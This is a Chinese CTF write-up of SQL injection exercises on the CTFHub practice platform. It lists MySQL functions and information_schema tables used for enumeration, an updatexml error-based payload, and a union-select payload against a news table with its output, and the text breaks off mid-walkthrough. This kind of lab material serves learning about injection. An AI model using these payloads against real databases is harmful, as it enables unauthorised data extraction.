今天在ctfhub整理了几个sql注入的解题过程,还算是比较详细的。
知识点都是比较常见的:每个题大致涉及的知识点用一张表格解释
!注:下方的 information_schema.xxxxxxxxxxxxxx皆表示 information_schema库下的表
如:schemata、tables等,不作特殊说明的都指information库下的数据表
还有此处的题是ctfhub整合好的,所以所有的数据库和表包括字段名都一样,不要偷懒。
关键字/语句/函数
解释
union select
联合查询,联合注入常用
database()
回显当前连接的数据库
version()
查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6
group_concat()
把产生的同一分组中的值用,连接,形成一个字符串
information_schema
存了很多mysql信息的数据库
information_schema.schemata
information_schema库的一个表,名为schemata
schema_name
schemata表中存储mysql所有数据库名字的字段
information_schema.tables
存了mysql所有的表
table_schema
tables表中存每个表对应的数据库名的字段
table_name
表的名字和table_schema一一对应
information_schema.columns
columns表存了所有的列的信息4
column_name
当你知道一个表的名字时,可通过次字段获得表中的所有字段名(列名)
table_name
表的名字和column_name一一对应
select updatexml(1,concat(0x7e,database(),0x7e),1);
这里注意,只在databse()处改你想要的内容即可报错回显
right(str, num)
字符串从右开始截取num个字符
left(str,num)
同理:字符串从左开始截取num个字符
substr(str,N,M)
字符串,从第N个字符开始,截取M个字符
SQL整数型注入
爆当前数据库
4 union select 3,database()
> `select * from news where id=4 union select 3,database()`
> ID: 3
> Data: sqli
根据information_schema.schema